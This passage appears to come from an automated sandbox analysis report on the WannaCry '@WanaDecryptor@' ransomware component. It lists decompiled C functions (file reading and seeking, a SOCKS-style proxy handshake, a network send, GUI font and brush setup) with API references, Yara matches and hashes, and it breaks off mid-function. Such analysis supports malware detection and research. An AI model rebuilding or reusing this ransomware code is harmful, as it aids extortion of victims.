                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
                                  				void* _t3;
                                  
                                  				_push(1);
                                  				_push(0x100);
                                  				_push(0);
                                  				L00412DDC();
                                  				_t3 = __ecx + 0x40;
                                  				_push(_t3); // executed
                                  				L00412DD6(); // executed
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				L00412C14();
                                  				return _t3;
                                  			}





                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                  • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00411660() {
                                  				signed int _t57;
                                  				signed int _t59;
                                  				unsigned int _t65;
                                  				intOrPtr _t66;
                                  				signed int _t68;
                                  				signed int _t71;
                                  				signed char _t86;
                                  				intOrPtr* _t100;
                                  				void* _t101;
                                  				signed int _t103;
                                  				void* _t105;
                                  				void* _t106;
                                  				void* _t107;
                                  				void* _t108;
                                  
                                  				_t100 =  *((intOrPtr*)(_t105 + 0x18));
                                  				if(_t100 != 0) {
                                  					__eflags =  *(_t100 + 0x18);
                                  					if( *(_t100 + 0x18) != 0) {
                                  						__eflags =  *(_t100 + 0x7c);
                                  						if(__eflags != 0) {
                                  							E00411AC0(_t100);
                                  							_t105 = _t105 + 4;
                                  						}
                                  						_t57 = E00411460(__eflags, _t100, _t105 + 0x14, _t105 + 0x18, _t105 + 0xc);
                                  						_t106 = _t105 + 0x10;
                                  						__eflags = _t57;
                                  						if(_t57 == 0) {
                                  							_t101 = malloc(0x84);
                                  							_t107 = _t106 + 4;
                                  							__eflags = _t101;
                                  							if(_t101 != 0) {
                                  								_t59 = malloc(0x4000); // executed
                                  								 *_t101 = _t59;
                                  								 *((intOrPtr*)(_t101 + 0x44)) =  *((intOrPtr*)(_t107 + 0x1c));
                                  								_t108 = _t107 + 4;
                                  								__eflags = _t59;
                                  								 *((intOrPtr*)(_t101 + 0x48)) =  *((intOrPtr*)(_t107 + 0x10));
                                  								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
                                  								if(_t59 != 0) {
                                  									 *((intOrPtr*)(_t101 + 0x40)) = 0;
                                  									__eflags =  *(_t100 + 0x34);
                                  									 *(_t101 + 0x54) =  *(_t100 + 0x3c);
                                  									 *((intOrPtr*)(_t101 + 0x50)) = 0;
                                  									 *(_t101 + 0x64) =  *(_t100 + 0x34);
                                  									 *((intOrPtr*)(_t101 + 0x60)) =  *_t100;
                                  									__eflags =  *(_t100 + 0x34) != 0;
                                  									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t100 + 0xc));
                                  									 *((intOrPtr*)(_t101 + 0x18)) = 0;
                                  									if( *(_t100 + 0x34) != 0) {
                                  										_t25 = _t101 + 4; // 0x4
                                  										 *((intOrPtr*)(_t101 + 0x24)) = 0;
                                  										 *((intOrPtr*)(_t101 + 0x28)) = 0;
                                  										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
                                  										_t71 = E00410380(_t25);
                                  										_t108 = _t108 + 4;
                                  										__eflags = _t71;
                                  										if(_t71 == 0) {
                                  											 *((intOrPtr*)(_t101 + 0x40)) = 1;
                                  										}
                                  									}
                                  									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t100 + 0x40));
                                  									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t100 + 0x44));
                                  									 *(_t101 + 0x6c) =  *(_t100 + 0x30) & 0x00000001;
                                  									_t86 =  *(_t100 + 0x30) >> 3;
                                  									__eflags = _t86 & 0x00000001;
                                  									if((_t86 & 0x00000001) == 0) {
                                  										_t65 =  *(_t100 + 0x3c) >> 0x18;
                                  										__eflags = _t65;
                                  										 *(_t101 + 0x80) = _t65;
                                  									} else {
                                  										 *(_t101 + 0x80) =  *(_t100 + 0x38) >> 8;
                                  									}
                                  									_t103 =  *(_t108 + 0x20);
                                  									_t45 = _t101 + 0x70; // 0x70
                                  									_t79 = _t45;
                                  									asm("sbb ecx, ecx");
                                  									 *_t45 = 0x12345678;
                                  									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
                                  									__eflags = _t103;
                                  									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c)) & 0x0000000c;
                                  									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
                                  									if(_t103 != 0) {
                                  										while(1) {
                                  											_t68 =  *_t103;
                                  											__eflags = _t68;
                                  											if(_t68 == 0) {
                                  												goto L21;
                                  											}
                                  											E004100D0(_t79, _t68);
                                  											_t108 = _t108 + 8;
                                  											_t103 = _t103 + 1;
                                  											__eflags = _t103;
                                  											if(_t103 != 0) {
                                  												continue;
                                  											}
                                  											goto L21;
                                  										}
                                  									}
                                  									L21:
                                  									_t66 =  *((intOrPtr*)(_t108 + 0x14));
                                  									 *((intOrPtr*)(_t101 + 8)) = 0;
                                  									_t53 = _t66 + 0x1e; // 0x345678ae
                                  									__eflags = 0;
                                  									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t100 + 0x78)) + _t53;
                                  									 *(_t100 + 0x7c) = _t101;
                                  									return 0;
                                  								} else {
                                  									free(_t101);
                                  									return 0xffffff98;
                                  								}
                                  							} else {
                                  								return 0xffffff98;
                                  							}
                                  						} else {
                                  							return 0xffffff99;
                                  						}
                                  					} else {
                                  						return 0xffffff9a;
                                  					}
                                  				} else {
                                  					return 0xffffff9a;
                                  				}
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Similarity
                                  • Opcode ID: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                  • Instruction ID: 97d1101cb4dc6e06905e0d83e2a099da94edd87715b03694c0ad860931ce0dc9
                                  • Opcode Fuzzy Hash: d771c3cdc0376eb06813951ce938a924a88f856aba0395dbcbb3fe4ec20f6b6d
                                  • Instruction Fuzzy Hash: 7F51D2B5600B018FC720DF2AE880597B7E0BF84314B544A2EEA9A83751D339F499CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410AF0(long _a4, signed int _a8, char _a12, char _a16) {
                                  				long _t26;
                                  				signed int _t28;
                                  				int _t31;
                                  				intOrPtr* _t34;
                                  				intOrPtr _t36;
                                  				signed int _t37;
                                  				signed int _t38;
                                  				intOrPtr _t47;
                                  				void* _t64;
                                  				signed int _t66;
                                  
                                  				_t1 =  &_a16; // 0x410d5a
                                  				_t34 =  *_t1;
                                  				_t66 = _a8;
                                  				_t3 =  &_a12; // 0x410d5a
                                  				_t26 = _t66 *  *_t3;
                                  				if( *_t34 == 0) {
                                  					_t47 =  *((intOrPtr*)(_t34 + 0x1c));
                                  					_t36 =  *((intOrPtr*)(_t34 + 0x18));
                                  					if(_t47 + _t26 > _t36) {
                                  						_t26 = _t36 - _t47;
                                  					}
                                  					_t17 =  &_a4; // 0x410d5a
                                  					_t37 = _t26;
                                  					_t64 =  *((intOrPtr*)(_t34 + 0x14)) + _t47;
                                  					_t38 = _t37 >> 2;
                                  					memcpy( *_t17, _t64, _t38 << 2);
                                  					_t28 = memcpy(_t64 + _t38 + _t38, _t64, _t37 & 0x00000003);
                                  					 *((intOrPtr*)(_t34 + 0x1c)) =  *((intOrPtr*)(_t34 + 0x1c)) + _t28;
                                  					return _t28 / _t66;
                                  				} else {
                                  					_t31 = ReadFile( *(_t34 + 4), _a4, _t26,  &_a4, 0); // executed
                                  					if(_t31 == 0) {
                                  						 *((char*)(_t34 + 8)) = 1;
                                  					}
                                  					return _a4 / _t66;
                                  				}
                                  			}

                                  APIs
                                  • ReadFile.KERNELBASE(000000FF,00000404,ZA,00000404,00000000,00000000,0000FFFF,00410D5A,00000000,00000404,00000001,?), ref: 00410B18
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: ZA
                                  • API String ID: 2738559852-706706751
                                  • Opcode ID: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                  • Instruction ID: 40231aa483a0e9c283400923c975ae8b8a6f0891fd27fdec0c6452f8272ca3df
                                  • Opcode Fuzzy Hash: 955d7e46bcdd16e9ef88f509da3f750024060405559589d6ed767fd5e6d7c93f
                                  • Instruction Fuzzy Hash: F401CE723042008BCB18CE18D890AABB7EAABC8610B0481ADEC498B305DA75EC15C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                  
                                  				_t1 =  &_a16; // 0x413236
                                  				_push( *_t1);
                                  				_push(_a12);
                                  				_push(_a8);
                                  				_push(_a4);
                                  				L0041343E(); // executed
                                  				return __eax;
                                  			}

                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                  • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00410A50(intOrPtr* _a4, long _a8, LONG* _a12) {
                                  				intOrPtr* _t18;
                                  				intOrPtr _t28;
                                  				LONG* _t29;
                                  				LONG* _t35;
                                  
                                  				_t18 = _a4;
                                  				_t28 =  *_t18;
                                  				if(_t28 == 0) {
                                  					L12:
                                  					_t29 = _a12;
                                  					if(_t29 != 0) {
                                  						if(_t29 != 1) {
                                  							if(_t29 == 2) {
                                  								 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x18)) + _a8;
                                  							}
                                  							return 0;
                                  						} else {
                                  							 *((intOrPtr*)(_t18 + 0x1c)) =  *((intOrPtr*)(_t18 + 0x1c)) + _a8;
                                  							return 0;
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)(_t18 + 0x1c)) = _a8;
                                  						return 0;
                                  					}
                                  				} else {
                                  					if( *((intOrPtr*)(_t18 + 1)) == 0) {
                                  						if(_t28 == 0) {
                                  							goto L12;
                                  						} else {
                                  							return 0x1d;
                                  						}
                                  					} else {
                                  						_t35 = _a12;
                                  						if(_t35 != 0) {
                                  							if(_t35 != 1) {
                                  								if(_t35 != 2) {
                                  									return 0x13;
                                  								} else {
                                  									_push(_t35);
                                  									goto L8;
                                  								}
                                  							} else {
                                  								_push(_t35);
                                  								L8:
                                  								SetFilePointer( *(_t18 + 4), _a8, 0, ??); // executed
                                  								return 0;
                                  							}
                                  						} else {
                                  							SetFilePointer( *(_t18 + 4),  *((intOrPtr*)(_t18 + 0xc)) + _a8, _t35, _t35); // executed
                                  							return 0;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • API String ID: 973152223-0
                                  • Opcode ID: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                  • Instruction ID: 8c7778caab8dc427a0eff36806a54932c8fce05917786e5a19e085de530b5182
                                  • Opcode Fuzzy Hash: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
                                  • Instruction Fuzzy Hash: 3F111C742143019FCB1CCF20C8A4ABB77A2AFE8351F15C55DF08A8B361E674D8859B48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004109C0(signed int __eax, intOrPtr _a4) {
                                  				intOrPtr _t10;
                                  
                                  				_t10 = _a4;
                                  				if(_t10 != 0) {
                                  					_t2 = _t10 + 0x10; // 0x683c247c
                                  					if( *_t2 != 0) {
                                  						_t3 = _t10 + 4; // 0x5b5e5fc0
                                  						FindCloseChangeNotification( *_t3); // executed
                                  					}
                                  					_push(_t10);
                                  					L00412C98();
                                  					return 0;
                                  				} else {
                                  					return __eax | 0xffffffff;
                                  				}
                                  			}

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(5B5E5FC0,?,00410F10,?), ref: 004109D9
                                  • #825.MFC42(00410F10,?,00410F10,?), ref: 004109E0
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Similarity
                                  • API ID: #825ChangeCloseFindNotification
                                  • API String ID: 3896714138-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
                                  				void* _v0;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				char _v266;
                                  				char _v267;
                                  				char _v268;
                                  				char _v272;
                                  				char _v280;
                                  				char _v282;
                                  				signed int _v283;
                                  				char _v284;
                                  				void _v287;
                                  				void _v288;
                                  				char _v289;
                                  				char _v290;
                                  				char _v291;
                                  				char _v292;
                                  				signed int _v296;
                                  				char _v304;
                                  				char _v312;
                                  				char _v313;
                                  				signed int _v315;
                                  				char _v323;
                                  				signed int _v324;
                                  				signed int _t58;
                                  				signed int _t65;
                                  				signed int* _t66;
                                  				void* _t71;
                                  				void* _t74;
                                  				void* _t86;
                                  				signed int* _t87;
                                  				void _t89;
                                  				signed int _t111;
                                  				signed int _t112;
                                  				signed int _t117;
                                  				void* _t127;
                                  				void* _t132;
                                  				void* _t141;
                                  				intOrPtr _t143;
                                  
                                  				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
                                  				if(_t58 != 0) {
                                  					L24:
                                  					return _t58 | 0xffffffff;
                                  				} else {
                                  					_t141 = _v0;
                                  					_t89 = 0;
                                  					_v272 = 0;
                                  					if(_a8 != 0) {
                                  						asm("repne scasb");
                                  						_t89 = 1;
                                  						_v272 = 1;
                                  					}
                                  					_v268 = 5;
                                  					_v267 = 1;
                                  					_v266 = 0;
                                  					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
                                  					if(_t58 < 0) {
                                  						L22:
                                  						_t143 = _a4;
                                  						if(_t143 > 0) {
                                  							__imp__#3(_t143); // executed
                                  						}
                                  						goto L24;
                                  					} else {
                                  						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
                                  						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
                                  							goto L22;
                                  						} else {
                                  							_v292 = 5;
                                  							_v291 = 1;
                                  							_v290 = 0;
                                  							if(_v16 == 0) {
                                  								_v289 = 1;
                                  								_v288 =  *_t141;
                                  								_t65 = _v20;
                                  								_v283 = _t65;
                                  								_v284 = _t65 >> 8;
                                  								_t66 =  &_v282;
                                  							} else {
                                  								_v289 = 3;
                                  								_t111 = _v296 & 0x000000ff;
                                  								_v288 = _t89;
                                  								_t112 = _t111 >> 2;
                                  								memcpy( &_v287, _t141, _t112 << 2);
                                  								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
                                  								_t117 = _v20;
                                  								 *_t86 = _t117 >> 8;
                                  								_t87 = _t86 + 1;
                                  								 *_t87 = _t117;
                                  								_t66 =  &(_t87[0]);
                                  							}
                                  							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
                                  							if(_t58 < 0) {
                                  								goto L22;
                                  							} else {
                                  								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
                                  								if(_t58 < 0) {
                                  									goto L22;
                                  								} else {
                                  									_t58 = _v315;
                                  									if(_t58 != 0) {
                                  										goto L22;
                                  									} else {
                                  										_t71 = _v313 - 1;
                                  										if(_t71 == 0) {
                                  											_t127 = _v0;
                                  											_push(6);
                                  											goto L19;
                                  										} else {
                                  											_t74 = _t71 - 2;
                                  											if(_t74 == 0) {
                                  												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
                                  												_t127 = _v0;
                                  												_push((_v324 & 0x000000ff) + 2);
                                  												_push( &_v323);
                                  												_push(_a4);
                                  												goto L20;
                                  											} else {
                                  												if(_t74 != 1) {
                                  													L21:
                                  													return 0;
                                  												} else {
                                  													_t127 = _v0;
                                  													_push(0x12);
                                  													L19:
                                  													_push( &_v312);
                                  													_push(_a4);
                                  													L20:
                                  													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
                                  													if(_t58 < 0) {
                                  														goto L22;
                                  													} else {
                                  														goto L21;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410A10(intOrPtr* _a4) {
                                  				intOrPtr _t6;
                                  				long _t10;
                                  				intOrPtr* _t14;
                                  
                                  				_t14 = _a4;
                                  				_t6 =  *_t14;
                                  				if(_t6 == 0) {
                                  					L5:
                                  					_t5 = _t14 + 0x1c; // 0x40468
                                  					return  *_t5;
                                  				} else {
                                  					_t2 = _t14 + 1; // 0xffffbdf8
                                  					if( *_t2 == 0) {
                                  						if(_t6 == 0) {
                                  							goto L5;
                                  						} else {
                                  							return 0;
                                  						}
                                  					} else {
                                  						_t3 = _t14 + 4; // 0x830000ff
                                  						_t10 = SetFilePointer( *_t3, 0, 0, 1);
                                  						_t4 = _t14 + 0xc; // 0x14247c89
                                  						return _t10 -  *_t4;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SetFilePointer.KERNELBASE(830000FF,00000000,00000000,00000001,?,00410CBB,?,00000000,?,00000000,FFFFFFFF,?), ref: 00410A2C
                                  Yara matches
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040C8F0(intOrPtr* __eax, intOrPtr* _a4, intOrPtr _a8) {
                                  				intOrPtr* _t5;
                                  				intOrPtr* _t6;
                                  				intOrPtr _t7;
                                  
                                  				_t5 = __eax;
                                  				_push(0x18); // executed
                                  				L00412CEC(); // executed
                                  				_t6 = _a4;
                                  				if(_t6 == 0) {
                                  					_t6 = __eax;
                                  				}
                                  				 *_t5 = _t6;
                                  				_t7 = _a8;
                                  				if(_t7 == 0) {
                                  					 *((intOrPtr*)(_t5 + 4)) = _t5;
                                  					return _t5;
                                  				} else {
                                  					 *((intOrPtr*)(_t5 + 4)) = _t7;
                                  					return _t5;
                                  				}
                                  			}

                                  APIs
                                  • #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  Yara matches
                                  Similarity
                                  • API ID: #823
                                  • String ID:
                                  • API String ID: 3944439427-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004102B0(int _a8, int _a12) {
                                  				void* _t4;
                                  
                                  				_t4 = calloc(_a8, _a12); // executed
                                  				return _t4;
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID: calloc
                                  • String ID:
                                  • API String ID: 2635317215-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004102D0(void* _a8) {
                                  				void* _t2;
                                  
                                  				_t2 = _a8;
                                  				free(_t2); // executed
                                  				return _t2;
                                  			}

                                  Yara matches
                                  Similarity
                                  • API ID: free
                                  • String ID:
                                  • API String ID: 1294909896-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00406F80(void* __ecx, void* __fp0) {
                                  				struct HFONT__* _t135;
                                  				long _t137;
                                  				long _t138;
                                  				long _t139;
                                  				long _t141;
                                  				long _t142;
                                  				long _t143;
                                  				long _t145;
                                  				long _t146;
                                  				long _t147;
                                  				long _t149;
                                  				void* _t214;
                                  				int _t216;
                                  				int _t235;
                                  				int _t238;
                                  				int _t240;
                                  				int _t242;
                                  				int _t245;
                                  				int _t248;
                                  				int _t251;
                                  				int _t253;
                                  				void* _t260;
                                  				void* _t262;
                                  				int _t339;
                                  				void* _t348;
                                  				int _t352;
                                  				intOrPtr _t355;
                                  				intOrPtr _t356;
                                  				intOrPtr _t357;
                                  				intOrPtr _t358;
                                  				void* _t359;
                                  				void* _t360;
                                  				void* _t361;
                                  				void* _t375;
                                  
                                  				_t375 = __fp0;
                                  				_push(0xffffffff);
                                  				_push(E00413E9B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t355;
                                  				_t356 = _t355 - 0xd4;
                                  				_t348 = __ecx;
                                  				_push(0);
                                  				E004076A0(__ecx);
                                  				_push(CreateSolidBrush(0xe0));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x121284));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe000));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe00000));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x3834d1));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x107c10));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xe8a200));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0xd77800));
                                  				L00412D5E();
                                  				_push(CreateSolidBrush(0x3cda));
                                  				L00412D5E();
                                  				_t339 = __ecx + 0x880;
                                  				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                  				L00412D5E();
                                  				_t216 = __ecx + 0x888;
                                  				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                  				L00412D5E();
                                  				_t352 = __ecx + 0x890;
                                  				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t135);
                                  				L00412D5E();
                                  				_push(0x3ed);
                                  				L00412CE6();
                                  				if(_t339 != 0) {
                                  					_t339 =  *(_t339 + 4);
                                  				}
                                  				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
                                  				_push(0x3fe);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t235 =  *(_t216 + 4);
                                  				} else {
                                  					_t235 = 0;
                                  				}
                                  				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
                                  				_push(0x3fb);
                                  				L00412CE6();
                                  				if(_t216 != 0) {
                                  					_t238 =  *(_t216 + 4);
                                  				} else {
                                  					_t238 = 0;
                                  				}
                                  				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
                                  				_push(0x3ff);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t240 =  *(_t352 + 4);
                                  				} else {
                                  					_t240 = 0;
                                  				}
                                  				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
                                  				_push(0x3fc);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
                                  					_t242 =  *(_t352 + 4);
                                  				} else {
                                  					_t242 = 0;
                                  				}
                                  				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
                                  				_push(0x400);
                                  				L00412CE6();
                                  				if(_t352 != 0) {
